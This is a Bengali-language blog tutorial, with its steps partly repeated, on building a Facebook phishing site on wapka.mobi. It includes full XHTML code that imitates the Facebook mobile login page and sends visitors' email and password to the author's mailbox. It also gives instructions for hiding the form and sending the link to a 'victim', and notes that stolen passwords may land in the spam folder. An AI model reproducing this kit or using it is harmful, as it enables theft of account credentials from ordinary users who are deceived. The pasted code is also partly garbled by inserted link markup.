অনেক দিন পর আজ আবার লিখতে বসলাম। আমার প্রথম টিউন এ আমি দেখিয়ে ছিলাম,
কিভাবে ২০১২ সালের ১টা ফিশিং সাইট হ্যাক করে, তার ভিতর এ জমা থাকা
পাসওয়ার্ড দেখা যায় । এর পর আমাকে অনেকেই ফেসবুক এ রিকুয়েস্ট করেছেন কিভাবে
১টা ফেসবুক ফিশিং সাইট বানাতে হয় তা নিয়ে যাতে ১টা টিউন করি ।
আমি আজ আপনাদের দেখাবো কিভাবে খুব সহজে http://wapka.mobi থেকে ফেসবুক এর ফিশিং সাইট তৈরি করা যায় । আপনাদের সবার আশা করি http://wapka.mobi থেকে কিভাবে সাইট বানাতে হয় তা নিয়ে ধারনা আছে ।
এতক্ষনে নিশ্চই wapka তে sign up করে ফেলেছেন ।
চলুন শুরু করা যাকঃ
প্রথমে আপনার সাইট এ এডমিন মোড এ প্রবেশ করুন, এবং
এর পর edit site এ ক্লিক করুন ।
এখান থেকে Mail Form এ ক্লিক করুন ।
Mail form এ ক্লিক করার পর নিচের মত দেখতে পাবেন
এবার এখান থেকে Enable captcha picture টা Unmark করে দেন, এবং নিচ থেকে submit এ চাপ দিন । এখন Homepage এ গেলে আমদের mail form টা দেখতে পাবেন, এখন আমাদের এই mail form টা থেকে একটা value কালেক্ট করতে হবে ।
চলুন কিভাবে value collect করবেন সেটা দেখাচ্ছি, value টা আমরা Html source code viewer দিয়ে কালেক্ট করব।
প্রথমে এই লিঙ্ক http://noob.mobile.in/source
এখানে গিয়ে আপনার ফিশিং সাইট এর লিঙ্ক টা লিখুন এবং View site html source এ mark করে দিন, এবং এরপর Go তে ক্লিক দিন ।
Go তে ক্লিক দেয়ার পর নিচের মতো একটা পেজ আসবে ।এবার এখান থেকে snap এ লাল কালি দিয়ে mark করা বক্স এ ক্লিক দিন
এই বার এখানে value টা খুজুন, যেমন আমি পেলাম,
এখান থেকে “p”value টাকে সাবধানে কোথাও লিখে রাখেন অথবা আপনার clipboard এ save করে রাখুন । আমি আমার mail form এর
“p” value পেলাম 127077869
চলুন আমরা এডমিন মুড এ আমদের সাইটে আবার ফিরে যাই। এবার আবারো নিচ থেকে edit site এ ক্লিক করুন এবং এখান থেকে wml/xhtml code এ ক্লিক করুন ।
এবার wml/xhtml code: বক্স এ নিচের এই কোড গুলো পেস্ট করুন ।
এখান থেকে copy করতে সমস্য হলে pastebin থেকে copy করে নিন
http://pastebin.com/RSRwzUt8
এই কোড গুলোর মধ্যে value=”XXXXXX” দেখতে পাবেন,এখানে এই xxxxxx এর যায় গায় ওই সময় আমরা html source code দিয়ে যেই value পেয়েছিলাম সেটি লিখব, যেমন আমি লিখলাম
লেখা হলে আমরা নিচের Submit বাটন এ ক্লিক করব ।
আমাদের কাজ এখনো শেষ হয়নি,এবার আমারা আবার Edit site থেকে Global setting এ ক্লিক করবো , তার পর এখান থেকে Head Tags (meta,style..) এ ক্লিক করব।
ক্লিক করার পর আমরা Head Tag: বক্স এ এই কোড গুলো হুবহু লেখব
<link href="http://nnfacebook.wapka.mobi/styles.css" rel="STYLESHEET" type="text/css" />
এখান থেকে copy করতে সমস্য হলে pastebin থেকে copy করুন
http://pastebin.com/nxfSJKtH
লেখার পর Set এ ক্লিক করব।
এবার আমরা আমাদের Home page এ আবার ফেরত যাবো
এবার আমাদের ফিশিং পেজ এ একটা Dynamic Look দেখতে পাচ্ছি, এখন আমাদের আরেকটা সমস্য সেটা হলো, আমাদের সাইট এ ভিজিট করলে mail form টা দেখা যায়। আমরা এবার এটাকে Hidden করে দিব। চলুন দেখাই কিভাবে Hidden করবেন, Edit site এ ক্লিক করে User এ ক্লিক করুন এবার এখান থেকে Item Visibility তে ক্লিক করুন। এখানে আমরা আমাদের ওয়েবসাইট এর সব গুলো Item দেখতে পাবো।
আমরা আমাদের মেইল ফরম এর পাশে A N L X দেখতে পাবো, আমরা এগুলো থেকে Mail form এর পাশে থাকা X এ ক্লিক করবো ।
এবার আপনি আপনার victim কে শুধু আপনার সাইট এর লিঙ্ক দিবেন (যেমন আমি দিবো http://nnfacebook.wapka.mobi), আপনার ভিক্টিম যদি এখানে লগিন করে, তাহলে তার ফেসবুক এর Email এবং Password আপনার Site টা যেই Email এড্রেস দিয়ে বানিয়েছেন সেই email এড্রেস এ চলে যাবে।
আমি আজ আপনাদের দেখাবো কিভাবে খুব সহজে http://wapka.mobi থেকে ফেসবুক এর ফিশিং সাইট তৈরি করা যায় । আপনাদের সবার আশা করি http://wapka.mobi থেকে কিভাবে সাইট বানাতে হয় তা নিয়ে ধারনা আছে ।
এতক্ষনে নিশ্চই wapka তে sign up করে ফেলেছেন ।
চলুন শুরু করা যাকঃ
প্রথমে আপনার সাইট এ এডমিন মোড এ প্রবেশ করুন, এবং
এর পর edit site এ ক্লিক করুন ।
এখান থেকে Mail Form এ ক্লিক করুন ।
Mail form এ ক্লিক করার পর নিচের মত দেখতে পাবেন
এবার এখান থেকে Enable captcha picture টা Unmark করে দেন, এবং নিচ থেকে submit এ চাপ দিন । এখন Homepage এ গেলে আমদের mail form টা দেখতে পাবেন, এখন আমাদের এই mail form টা থেকে একটা value কালেক্ট করতে হবে ।
চলুন কিভাবে value collect করবেন সেটা দেখাচ্ছি, value টা আমরা Html source code viewer দিয়ে কালেক্ট করব।
প্রথমে এই লিঙ্ক http://noob.mobile.in/source
এখানে গিয়ে আপনার ফিশিং সাইট এর লিঙ্ক টা লিখুন এবং View site html source এ mark করে দিন, এবং এরপর Go তে ক্লিক দিন ।
Go তে ক্লিক দেয়ার পর নিচের মতো একটা পেজ আসবে ।এবার এখান থেকে snap এ লাল কালি দিয়ে mark করা বক্স এ ক্লিক দিন
এই বার এখানে value টা খুজুন, যেমন আমি পেলাম,
এখান থেকে “p”value টাকে সাবধানে কোথাও লিখে রাখেন অথবা আপনার clipboard এ save করে রাখুন । আমি আমার mail form এর
“p” value পেলাম 127077869
(বিঃদ্রঃ- এখানে অনেক গুলো value পাবেন, আপনার শুধু “p” value টা নিবেন।আর আপনার এই value কালেক্ট করাটা যে কোনো html source code viewer দিয়ে করতে পারেন, pc ইউসার রা মজিলা ফায়ারফক্স থেকে আপনার সাইট এ ঢুকে ctrl+u চাপ দিলে HTML CODE দেখতে পাবেন)।
চলুন আমরা এডমিন মুড এ আমদের সাইটে আবার ফিরে যাই। এবার আবারো নিচ থেকে edit site এ ক্লিক করুন এবং এখান থেকে wml/xhtml code এ ক্লিক করুন ।
এবার wml/xhtml code: বক্স এ নিচের এই কোড গুলো পেস্ট করুন ।
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "<a href="http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html']);" rel="nofollow">http://www.wapforum.org/DTD/xhtml-mobile10.dtd"><html</a> xmlns="<a href="http://www.w3.org/1999/xhtml">" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://www.w3.org/1999/xhtml">']);" rel="nofollow">http://www.w3.org/1999/xhtml"></a>;<script type="text/javascript"> document.title = "Welcome to Facebook"; </script><head title="Welcome to Facebook"><title>Welcome to Facebook</title><meta name="description" content="Facebook helps you connect and share with the people in your life." /><meta name="referrer" content="default" id="meta_referrer" /><meta http-equiv="X-Frame-Options" content="deny" /><!-----[ » © Fb Phishing 2013 copyrighted by nisad™ « ]-----!></head><body class="nontouch acw"><div class="mfsm"><div id="viewport"><div class="acb aps" id="u_0_0" data-sigil="MTopBlueBarHeader"><table cellspacing="0" cellpadding="0" class="lr"><tr><td valign="top"><h1><a href="<a href="http://m.facebook.com/home.php"><img" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/home.php"><img']);" rel="nofollow">http://m.facebook.com/home.php"><img</a> src="<a href="http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png"" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png"']);" rel="nofollow">http://static.ak.fbcdn.net/rsrc.php/v2/yz/r/aKhO2tw3FnO.png"</a>; width="76" height="20" class="img" alt="facebook" /></a></h1></td><td valign="top" class="r"><a class="btn btnS" href="<a href="http://m.facebook.com/r.php">Create"
onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/r.php">Create']);"
rel="nofollow">http://m.facebook.com/r.php">Create</a> Account</a></td></tr></table></div><div id="objects_container"><div id="root" tabindex="0" role="main" class="_fco acw" data-sigil="context-layer-root"><div class="acy aps abb"><span class="mfss">You must log in first.</span></div><div class="aclb"><div class="loginInner"><div class="acy apl abt abb"><a href="<a href="http://m.facebook.com/fbapp/d/facebook.jad">Get"
onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/fbapp/d/facebook.jad">Get']);"
rel="nofollow">http://m.facebook.com/fbapp/d/facebook.jad">Get</a> Facebook Mobile and browse faster.</a></div><form method="post" class="mobile-login-form _fcp" onSubmit="window.open ('http://facebook.com')" action="site_0.xhtml"><div class="mobile-login-field aclb apl"><div>Email or Phone<br/><input type="text" name="mf_text[Email]" class="input"/></div></div><div class="mobile-login-field aclb apl"><div>Password<br/><input type="password" class="input" name="mf_text[Password]"/></div></div><div class="button_area aclb apl"><input type="hidden" name="p" value="XXXXXXXX"/><input type="hidden" name="action" value="send_message"/><input type="submit" name="MF_submit" class="btn btnC largeBtn" size="0" value="Log In" /></div><hr style="background-color:#cccccc;height:1px;border:0px solid #fff;margin:0.3em auto;width:100%;" /><div class="mobile-login-form _fcp"><span class="mfss fcg" style="margin-left:6px;"><b>New to Facebook?</b></span></div><div class="_4u9b aclb"><div class="button_area aclb apl"><a class="btn btnS largeBtn" href="<a href="http://m.facebook.com/r.php">Create"
onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/r.php">Create']);"
rel="nofollow">http://m.facebook.com/r.php">Create</a> New Account</a></div></div><input type="hidden" autocomplete="off" name="_fb_noscript" value="true" /></form><div class="other-links aclb apl"><span class="mfsm fcg"><a href="<a href="http://m.facebook.com/recover/initiate">Forgot"
onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/recover/initiate">Forgot']);"
rel="nofollow">http://m.facebook.com/recover/initiate">Forgot</a> password?</a><br /><a href="<a href="http://m.facebook.com/help">Help"
onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/help">Help']);"
rel="nofollow">http://m.facebook.com/help">Help</a> Center</a></span></div></div></div></div></div><div><div id="footer"><div class="acg apm"><span class="mfss fcg"><b>English (US)</b> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="<a href="http://m.facebook.com/a/language.php">Español</a>" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/a/language.php">Español</a>']);" rel="nofollow">http://m.facebook.com/a/language.php">Español</a></a>; <span role="separator" aria-hidden="true">·</span> <a class="sec" href="<a href="http://m.facebook.com/a/language.php">Português"
onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/a/language.php">Português']);"
rel="nofollow">http://m.facebook.com/a/language.php">Português</a> (Brasil)</a> <span role="separator" aria-hidden="true">·</span> <a class="sec" href="<a href="http://m.facebook.com/language.php">More…</a></span></div><div" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','http://m.facebook.com/language.php">More…</a></span></div><div']);" rel="nofollow">http://m.facebook.com/language.php">More…</a></span></div><div</a> class="acg apm"><span class="mfss fcg">Facebook ©2013</span></div></div></div></div><div id="static_templates"></div></div></body></html> |
http://pastebin.com/RSRwzUt8
এই কোড গুলোর মধ্যে value=”XXXXXX” দেখতে পাবেন,এখানে এই xxxxxx এর যায় গায় ওই সময় আমরা html source code দিয়ে যেই value পেয়েছিলাম সেটি লিখব, যেমন আমি লিখলাম
লেখা হলে আমরা নিচের Submit বাটন এ ক্লিক করব ।
(মনে রাখবেন আমি আমার সাইট এর জন্য যে value পেয়েছি সেটি লিখেছি, আপনি আপনার টা লিখবেন)Submit এ ক্লিক করার পর আমারা এই রকম দেখতে পাবো
আমাদের কাজ এখনো শেষ হয়নি,এবার আমারা আবার Edit site থেকে Global setting এ ক্লিক করবো , তার পর এখান থেকে Head Tags (meta,style..) এ ক্লিক করব।
ক্লিক করার পর আমরা Head Tag: বক্স এ এই কোড গুলো হুবহু লেখব
<link href="http://nnfacebook.wapka.mobi/styles.css" rel="STYLESHEET" type="text/css" />
এখান থেকে copy করতে সমস্য হলে pastebin থেকে copy করুন
http://pastebin.com/nxfSJKtH
লেখার পর Set এ ক্লিক করব।
এবার আমরা আমাদের Home page এ আবার ফেরত যাবো
এবার আমাদের ফিশিং পেজ এ একটা Dynamic Look দেখতে পাচ্ছি, এখন আমাদের আরেকটা সমস্য সেটা হলো, আমাদের সাইট এ ভিজিট করলে mail form টা দেখা যায়। আমরা এবার এটাকে Hidden করে দিব। চলুন দেখাই কিভাবে Hidden করবেন, Edit site এ ক্লিক করে User এ ক্লিক করুন এবার এখান থেকে Item Visibility তে ক্লিক করুন। এখানে আমরা আমাদের ওয়েবসাইট এর সব গুলো Item দেখতে পাবো।
আমরা আমাদের মেইল ফরম এর পাশে A N L X দেখতে পাবো, আমরা এগুলো থেকে Mail form এর পাশে থাকা X এ ক্লিক করবো ।
(X এ ক্লিক করার মানে হলো এই মেইল ফরম টা সাধারণ কেউ আর দেখতে পাবেনা, এটা শুধু এডমিন মুড এ দেখা যাবে)ব্যস আমাদের কাজ শেষ, আমাদের ফশিং সাইট তৈরি
এবার আপনি আপনার victim কে শুধু আপনার সাইট এর লিঙ্ক দিবেন (যেমন আমি দিবো http://nnfacebook.wapka.mobi), আপনার ভিক্টিম যদি এখানে লগিন করে, তাহলে তার ফেসবুক এর Email এবং Password আপনার Site টা যেই Email এড্রেস দিয়ে বানিয়েছেন সেই email এড্রেস এ চলে যাবে।
(অনেক সময় আমাদের ই-মেইল প্রবাইডার রা এটাকে spam হিশাবে সনাক্ত করে, ভয় এর কিছু নাই যদি password আপনার inbox না যায় তাহলে email টি আপনার email এর junk অথবা spam ফোল্ডার এ চেক করলে পাবেন)ধন্যবাদ সবাই কে,
যদি কেউ কিছু না বুজতে পারেন তাহলে কমেন্ট করুন ।
অথবা, আমাকে ফেসবুক মেসেজ করতে পারেনঃ Nazmul
